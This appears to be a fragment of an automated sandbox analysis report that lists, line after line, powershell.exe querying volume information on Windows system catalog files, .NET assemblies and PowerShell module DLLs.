Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
